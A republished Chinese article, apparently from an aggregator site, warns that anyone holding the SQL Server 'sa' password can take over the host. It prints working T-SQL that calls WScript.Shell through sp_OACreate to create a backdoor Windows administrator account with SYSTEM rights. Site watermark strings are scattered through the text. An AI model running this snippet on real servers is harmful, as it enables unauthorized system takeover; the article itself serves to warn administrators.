SQLServer的安全隐患:不要认为黑掉的只是SQLSERVER罢了.[MSSQL防范]
本文“SQLServer的安全隐患:不要认为黑掉的只是SQLSERVER罢了.[MSSQL防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
sql server存在着非常严重的安全隐患.sa的密码就像Administrator的密码一样重要.www.c hinaitpower.comluGuV5
假定别人得到了数据库超级用户sa的密码,那么他/她可以在查询解析器里利用下面的SQL语句简单在Win2000(SQL SERVER所在的Server)上成立一个超级用户:www.c hinaitpower.comluGuV5
declare @object int
--成立WScript.Shell
EXEC sp_OACreate 'WScript.Shell',@object OUT
--运行net user iamhacker opendoor /add
--增添一个名字为iamhacker,密码为opendoor的用户
EXEC sp_OAMethod @object,'Run',NULL,'net user iamhacker opendoor /add'
--把iamhacker增添到Administrators组中
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Administrators iamhacker /add'
--把iamhacker从User组中删除
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Users iamhacker /del'www.c hinaitpower.comluGuV5
我已经尝试过了..实在太可怕了.www.c hinaitpower.comluGuV5
上面的语句很短.核心是可以调用平台号令 net .www.c hinaitpower.comluGuV5
其实现办法是SQL SERVER调用COM Automation的强盛功效.再配合WSH中的一个对象WScript.Shell的一个办法:Run.(注意,普通SQL SERVER都是配置在SYSTEM的权限下运行的.也就是说,Run所调用的程序也是具有SYSTEM的权限.)www.c hinaitpower.comluGuV5
(相关的实行是,调用一下NOTEPAD,那么任务管理器下将有效户为SYSTEM的NOTEPAD.EXE进程存在)www.c hinaitpower.comluGuV5
WScript.Shell的隐患其实已经在各个方面很明显了.想不到目前竟然在Sql Server上也有相关的问题.www.c hinaitpower.comluGuV5
所以.大家一定要注意保管好sa的密码.不要随便被人黑了哦...www.c hinaitpower.comluGuV5
www.c hinaitpower.comluGuV5
www.c hinaitpower.comluGuV5
以上是“SQLServer的安全隐患:不要认为黑掉的只是SQLSERVER罢了.[MSSQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:本文地址: | 与您的QQ/BBS好友分享! |